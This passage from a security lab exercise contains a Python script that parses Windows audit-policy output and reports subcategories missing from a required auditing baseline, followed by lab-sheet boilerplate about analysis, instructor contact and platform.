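    ("System", "System Integrity"): {"Success", "Failure"},
    ("Account Logon", "Credential Validation"): {"Success", "Failure"},
}

SUB_RE = re.compile(r"^  (\S.*?)\s{2,}(No Auditing|Success and Failure|Success|Failure)\s*$")
HEADERS = ("System audit policy", "Category/Subcategory")

def parse_auditpol(text):
    """Return {(category, subcategory): set of audited outcomes}."""
    policy, category = {}, None
    for line in text.splitlines():
        m = SUB_RE.match(line)
        if m:
            name, setting = m.groups()
            policy[(category, name)] = (
                set() if setting == "No Auditing" else set(setting.split(" and ")))
        elif line.strip() and not line.startswith(" ") and not line.startswith(HEADERS):
            category = line.strip()  # a category line introduces the subcategories below
    return policy

def find_gaps(policy, required=REQUIRED):
    """Return {(category, subcategory): outcomes the policy fails to audit}."""
    missing = {k: v - policy.get(k, set()) for k, v in required.items()}
    return {k: v for k, v in missing.items() if v}

if __name__ == "__main__":
    for (cat, sub), outcomes in find_gaps(parse_auditpol(CLEARED_OUTPUT)).items():
        print(f"{cat} / {sub}: not auditing {sorted(outcomes)}")
```

In practice the text comes from running the command and capturing its output; an empty result from find_gaps means the baseline is intact.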
Lab Analysis


Analyze and document the results related to the lab exercise.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB. 


Internet Connection Required

Yes / No

Platform Supported

Classroom / iLabs